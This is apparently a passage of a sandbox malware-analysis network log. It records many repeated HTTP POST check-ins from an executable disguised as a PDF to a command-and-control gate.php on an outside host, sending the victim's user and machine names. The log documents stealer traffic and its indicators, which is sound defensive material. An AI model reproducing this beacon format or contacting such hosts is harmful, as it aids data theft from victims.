                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    166192.168.2.34990547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:36.607418060 CET4684OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:36.624034882 CET4684OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:36.665095091 CET4685INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:53 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    167192.168.2.34990647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:37.095773935 CET4686OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:37.112641096 CET4686OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:37.155846119 CET4686INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:54 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    168192.168.2.34990747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:37.635993004 CET4687OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:37.652589083 CET4687OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:37.696413994 CET4687INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:54 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    169192.168.2.34990847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:38.137931108 CET4688OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:38.154437065 CET4688OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:38.195617914 CET4689INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:55 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    17192.168.2.34972647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:35.243072987 CET88OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:35.259756088 CET88OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:35.402596951 CET88INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:52 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    170192.168.2.34990947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:38.614969969 CET4690OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:38.631479979 CET4690OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:38.673676014 CET4690INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:55 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    171192.168.2.34991047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:39.153875113 CET4691OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:39.170475006 CET4691OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:39.215094090 CET4692INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:56 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    172192.168.2.34991147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:39.682728052 CET4692OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:39.701303005 CET4693OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:39.788075924 CET4693INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:56 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    173192.168.2.34991247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:40.012777090 CET4694OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:40.029597998 CET4694OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:40.177683115 CET4694INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:57 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    174192.168.2.34991347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:40.407026052 CET4695OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:40.423697948 CET4695OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:40.478810072 CET4696INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:57 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    175192.168.2.34991447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:40.694808006 CET4696OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:40.712263107 CET4697OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:40.754847050 CET4697INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    176192.168.2.34991547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:40.969554901 CET4698OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:40.986166000 CET4698OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:41.031966925 CET4698INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    177192.168.2.34991647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:41.260654926 CET4699OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:41.277364016 CET4699OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:41.322047949 CET4700INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    178192.168.2.34991747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:41.552180052 CET4700OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:41.568866014 CET4701OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:41.623253107 CET4701INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:58 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    179192.168.2.34991847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:41.839242935 CET4702OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:41.855907917 CET4702OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:41.890985966 CET4703INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    18192.168.2.34972747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:36.028625965 CET89OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:36.045317888 CET89OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:36.086844921 CET90INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:53 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    180192.168.2.34991947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:42.127760887 CET4704OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:42.144725084 CET4704OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:42.191509962 CET4704INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:59 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    181192.168.2.34992047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:42.798963070 CET4705OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:42.815699100 CET4705OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:42.862196922 CET4705INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    182192.168.2.34992147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:43.096434116 CET4706OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:43.113145113 CET4707OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:43.192491055 CET4707INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:00 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    183192.168.2.34992247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:43.408715963 CET4708OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
